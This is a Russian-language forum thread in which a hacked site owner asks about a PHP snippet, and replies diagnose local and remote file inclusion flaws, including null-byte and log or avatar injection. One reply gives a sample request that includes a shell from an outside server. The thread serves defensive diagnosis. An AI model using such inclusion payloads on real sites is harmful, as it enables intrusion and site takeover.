|
22.12.2012 13:34:51
Насколько я знаю вы можете только переместится на каталог выше, передав в начало строки ../
|
|
|
|
|
|
22.12.2012 15:01:23
т.е. этот кусок кода никак не может быть связан с заливом шела на сайт?
У меня просто недавно взломали сайт. Сейчас пытаюсь обнаружить причину. И больше грешить вроде не на что. |
|
|
|
|
|
22.12.2012 15:04:49
Почитайте про null-byte. В интернете полно информации по этому вопросу.
|
|
|
|
|
|
22.12.2012 15:48:12
Это локальный инклюд.
Для эксплуатирвоания уязвимости нужно каким либо образом записать уязвимый код на сервер. К слову - таких способов есть множество (загрузка кода в аватаре, инъектирование его в логи и пр.) Риск такой уязвимости расценивается как высокий При включенных register_globals имеется удаленный пхп инклюд С учетом этого условия, риск уже критический Данный код с большой вероятностью мог быть использован для взлома сайта. |
|
|
|
|
|
22.12.2012 23:12:03
|
|||
|
|
|
|
22.12.2012 23:36:26
Почитайте опять же про register_globals, в данном случае, переменной с title присваивается значение только если передан параметр art, если не передать параметр art, в вместо него передать title, например /script.php?title=http://other-site/shell.php то подключится файл со стороннего сервера, но это маловероятно, давно не встречал включенный register_globals. Я бы вам настоятельно порекомендовал ознакомится хотя-бы поверхностно с базовыми правилами написания хоть сколь-нибудь безопасных скриптов на php.
Да, и еще для эксплуатации этой уязвимости должен быть включен параметр allow_url_fopen.
Изменено: Ayanami - 22.12.2012 23:38:09
|
|
|
|
|
|
23.12.2012 10:10:56
Спасибо! Обязательно изучу вопрос.
|
|
|
|
|
|
23.12.2012 10:32:16
Ayanami все правильно сказал.
Однако даже если удаленный инклюд не эксплуатируем в этом случае, то через локальный инклюд, который присутствует тут безусловно, взломать сайт более чем вероятно. |
||||
|
|
|
|||